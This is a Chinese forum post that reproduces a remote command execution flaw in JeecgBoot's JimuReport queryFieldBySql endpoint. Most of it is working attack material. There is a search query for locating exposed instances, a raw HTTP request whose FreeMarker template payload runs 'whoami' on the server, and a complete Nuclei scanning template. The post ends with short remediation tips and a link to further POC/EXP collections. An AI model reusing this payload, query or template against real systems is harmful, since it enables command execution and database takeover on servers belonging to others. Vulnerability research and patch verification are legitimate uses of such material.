qidao123.com技术社区-IT企服评测·应用市场

标题: 【漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞 [打印本页]
作者: 饭宝    时间: 2024-11-6 01:05
标题: 【漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞

》》》产品描述《《《

        积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!
》》》漏洞描述《《《

        JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞,通过这个漏洞可以利用服务器的数据库。这意味着不法分子可以使用这个漏洞来获取对数据库的完全控制权,从而查看、修改乃至删除数据库中的数据,严重威胁系统的安全性。
》》》搜刮语句《《《

title="Jeecg-Boot 快速开辟平台" || body="积木报表"

》》》漏洞复现《《《

  1. POST /jmreport/queryFieldBySql HTTP/1.1
  2. Host: 127.0.0.1
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
  4. Content-Length: 100
  5. Content-Type: application/json; charset=utf-8
  6. Accept-Encoding: gzip, deflate, br
  7. Connection: keep-alive
  9. {"sql":"select '<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}'"}
复制代码

yaml
  1. id: JeecgBoot 积木报表 queryFieldBySql
  3. info:
  4.   name: JeecgBoot 积木报表 queryFieldBySql
  5.   author: Kelicehn
  6.   severity: high
  8. http:
  9.   - raw:
  10.       - |
  11.         POST /jmreport/queryFieldBySql HTTP/1.1
  12.         Host: {{Hostname}}
  13.         User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
  14.         Content-Length: 100
  15.         Content-Type: application/json; charset=utf-8
  16.         Accept-Encoding: gzip, deflate, br
  17.         Connection: keep-alive
  19.         {"sql":"select '<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}'"}
  21.     matchers-condition: and
  22.     matchers:
  23.       - type: status
  24.         status:
  25.           - 200
  26.       - type: word
  27.         words:
  28.           - "freemarker.template.utility.Execute"
  29.           - "$(whoami)"
复制代码
》》》修复发起《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全装备设置访问策略,设置白名单访问。
3、升级产品到最新版本
   
-------------------------------------------------------------------------------------------------------------------------

  
-------------------------------------------------------------------------------------------------------------------------

  
  
更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

  

  
-------------------------------------------------------------------------------------------------------------------------

  
-------------------------------------------------------------------------------------------------------------------------

  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 qidao123.com技术社区-IT企服评测·应用市场 (https://dis.qidao123.com/) Powered by Discuz! X3.4